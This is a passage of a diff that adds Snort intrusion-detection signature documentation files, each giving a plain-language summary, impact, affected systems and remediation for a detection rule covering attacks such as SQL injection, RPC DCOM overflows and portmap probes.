+2008
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to CVS using the credentials of a user with escalated privileges. Should
+this attempt be succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+determined activity by an attacker to gain unauthorized access to the 
+CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure and contents is vulnerable.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to CVS using the credentials of an authorized user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type their username.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
--- /dev/null
+++ b/doc/signatures/2666.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2664
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against a POP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the POP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier POP daemon are vulnerable to format string
+exploits prior to and during authentication to the POP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP/POP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1448.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1448
+
+--
+Summary:
+This event is generated when a request is sent to the Microsoft
+Terminal Server port.
+
+--
+Impact:
+Denial of service. Sending repeated requests may cause a denial of
+service by consuming all available memory resources.
+
+--
+Detailed Information:
+A flaw exists in the Microsoft Terminal Server port on certain versions
+of Windows that may cause a denial of service of the vulnerable host by
+consuming all available memory resources.  This attack requires multiple
+packets to cause a denial of service.
+
+--
+Affected Systems:
+Microsoft Windows 2000 Advanced Server SP2
+Microsoft Windows 2000 Advanced Server SP1
+Microsoft Windows 2000 Advanced Server
+Microsoft Windows 2000 Datacenter Server SP2
+Microsoft Windows 2000 Datacenter Server SP1
+Microsoft Windows 2000 Datacenter Server
+Microsoft Windows 2000 Server SP2
+Microsoft Windows 2000 Server SP1
+Microsoft Windows 2000 Server
+Microsoft Windows NT Terminal Server 4.0
+
+--
+Attack Scenarios:
+An attacker may attempt to cause a denial of service against a
+vulnerable server by sending repeated requests.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patches discussed in Microsoft Security Bulletin MS01-040.
+Block access to the Microsoft Terminal Server port from outside the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0540
+
+--
--- /dev/null
+++ b/doc/signatures/100000765.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000765
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "LifeType" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "date" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "date" parameter in the "index.php" script used by the "LifeType" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using LifeType
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/381.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+381
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Solaris host running SING software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Solaris host running SING software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS448
+
+--
--- /dev/null
+++ b/doc/signatures/2899.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2899
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3324.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3324
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1125.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1125
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1746.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1746
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cachefsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cachefsd is using.  Attackers can also learn what versions of the cachefsd protocol are accepted by cachefsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cachefsd run.  The cachefsd RPC service is used by Solaris hosts to cache requests for remote file systems mounted by the Network File System (NFS).  There is a vulnerability associated with cachefsd that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of cachefsd, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.5.1, 2.6, 7, 8, 9 
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cachefsd runs.  This may be a precursor to an attack to exploit the cachefsd buffer overflow.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to perform NFS mounts, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cachefsd, not probes of the cachefsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cachefsd service itself. An attacker may attempt to go directly to the cachefsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-0084
+
+Bugtraq:
+http://www.securityfocus.com/bid/4674
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000664.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000664
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000756.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000756
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "history.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "history.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/892.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+892
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000520.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000520
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Xarancms" application running on a webserver. Access to 
+the file "xaramcms_haupt.php" with SQL commands being passed as the "id" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "xaramcms_haupt.php" script used 
+by the "Xarancms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Xarancms
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2711.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2711
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_flavor_change
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1035.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1035
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1140.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1140
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000492.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000492
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "newpm.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "newpm.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1771.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1771
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3415.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3415
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1505.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1505
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1299.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1299
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ttdbserverd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ttdbserverd is using.  Attackers can also learn what versions of the ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ttdbserverd run.  The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications used in Common Desktop Environment (CDE) to communicate.  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server comes enabled on hosts with CDE.  Multiple vulernabilities have been associated with the ToolTalk database server. 
+
+--
+Affected Systems:
